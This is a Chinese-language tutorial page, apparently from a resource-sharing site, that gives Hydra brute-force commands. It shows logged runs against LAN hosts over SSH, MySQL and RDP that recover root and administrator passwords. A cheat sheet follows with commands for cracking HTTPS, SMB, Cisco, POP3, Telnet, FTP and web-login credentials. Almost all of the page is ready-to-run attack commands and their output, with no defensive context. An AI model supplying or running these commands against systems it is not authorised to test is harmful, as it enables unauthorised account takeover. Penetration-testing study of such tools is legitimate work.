常用实例:
SSH暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 5 192.168.2.235 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:08:41
[DATA] max 5 tasks per 1 server, overall 5 tasks, 10 login tries (l:2/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.2.235:22/
[22][ssh] host: 192.168.2.235 login: root password: HDXY123!@#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:08:46
mysql暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 5 192.168.2.235 mysql
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:07:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 8 login tries (l:2/p:4), ~2 tries per task
[DATA] attacking mysql://192.168.2.235:3306/
[3306][mysql] host: 192.168.2.235 login: root password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:07:26
远程桌面暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 1 192.168.2.57 rdp
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:12:10
[WARNING] the rdp module is experimental. Please test, report – and if possible, fix.
[DATA] max 1 task per 1 server, overall 1 task, 15 login tries (l:3/p:5), ~15 tries per task
[DATA] attacking rdp://192.168.2.57:3389/
[3389][rdp] host: 192.168.2.57 login: administrator password: HDXY123!@#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:12:11
其他常用破解命令
使用hydra破解ssh的密码
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
破解https:
hydra -m /index.php -l username -P pass.txt IP https
破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
破解cisco:
hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解smb:
hydra -l administrator -P pass.txt IP smb
破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
破解rdp:
hydra IP rdp -l administrator -P pass.txt -V
破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
破解telnet
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
破解ftp:
hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV
<
p class=”p” align=”justify” style=”margin: 7.5pt 0pt 7.5pt 22.5pt;text-indent: 0pt;padding: 0pt;text-align: justify;background-image: initial;background-position: initial;background-size: initial;background-attachment: initial”>get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php
常见问题FAQ
- 本站的资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。
- 我可以随意使用学习的技术么?
- 为什么有些资源打不开?